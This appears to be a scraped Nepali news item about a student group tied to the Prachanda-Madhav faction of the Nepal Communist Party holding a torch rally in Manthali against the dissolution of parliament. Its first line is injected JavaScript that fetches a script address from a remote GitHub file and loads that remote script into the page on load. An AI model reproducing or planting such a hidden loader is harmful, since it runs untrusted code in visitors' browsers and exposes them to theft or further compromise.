;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २१, रामेछाप । नेपाल कम्युनिष्ट पार्टी नेकपा प्रचण्ड माधव समुह निकट विद्यार्थी संगठनले मन्थलीमा राँके जुलुस निकालेकाे छ । संसद विघटन असंवैधानिक कदम तत्काल फिर्ता गरियोस् भन्दैै साे समुहले बिहिबार (भाेेेली) आमहडताल बुधबार पार्टीको केन्द्रीय समितिले घाेषणा गरेकाे छ । हाेसी घाेषणालाई सफल पार्न बुधबार साँझ राँकेजुलुस् निकालेकाे हाे ।
उनीहरुले भाेली हुने आमहडताल सफल पाराै संसद पुनःस्थापन गर लगाएतका नारा लगाएका थिए ।
फेसबुक प्रतिक्रियाहरु